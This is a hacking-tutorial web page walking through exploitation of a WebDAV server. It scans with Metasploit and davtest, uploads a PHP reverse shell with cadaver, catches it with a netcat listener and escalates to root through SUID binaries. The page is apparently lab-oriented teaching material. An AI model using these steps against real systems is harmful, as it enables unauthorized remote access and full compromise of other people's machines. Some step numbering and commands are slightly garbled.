Learn2Hack

Live one-one-one lessons


network security
Tutorials

-Using A VPN
-Hacking Basics
-Intro To Linux
-SQLmap
-Exploiting WebDAV
-Hack Wifi
-Ngrok with Beef-XSS
-Using Proxychains
-Netcat Basic Usage
-Nmap Tutorial
-Password Attacks
-Phishing
-How to use Wireshark

Python

-Intro To Python
-Intermediate Python
-Python Port Scanner
-Python Sandbox

Exploiting WebDAV


Getting a remote shell on a Linux system



Step 1: Scan for Weaknesses with Metasploit
  1. Open Metasploit: $msfconsole
  2. Search for WebDAV modules:search webdav
  3. Load the webdav_scanner: use auxiliary/scanner/http/webdav_scanner
  4. Set path to /dav/: set path /dav/
  5. Set target IP:set RHOSTS 192.168.1.254
  6. Execute:exploit

Step 2: Asses File Permissions Using DAVTest
  1. Run davtest: davtest -url http://192.168.1.254/dav
  2. Check for successful directory creation and file uploads

Step 3: Upload with Cadaver
  1. Connect via cadaver:$cadaver http://192.168.1.254/dav
  2. Test with a file:put test.txt
  3. Use and configre a php reverse shell using webshells:$webshellsMake sure you configure IP and port
  4. If successful upload a PHP reverse shell: put php-reverse-shell.php

  5. Step 5: Catch the Shell
  6. Start a listener on the same port as the reverse shell uses:$nc -lvnp 5555

Step 6: Privilege Escalation
  1. Explore methods such as kernel exploits, misconfigs, and programs running with root level privs
  2. You can use the tool LinEnum to check for any methodsLinEnum
  3. Identify SUID files
  4. Execute a privileged process to spwan root shell:./path/to/suid_executable -c "/bin/bash/"

You should now have root level access

Copyright © Learn2Hack 2023


Contact: info@learn2hack.io

Telephone: 1 306 992-2446

Policy
minicoders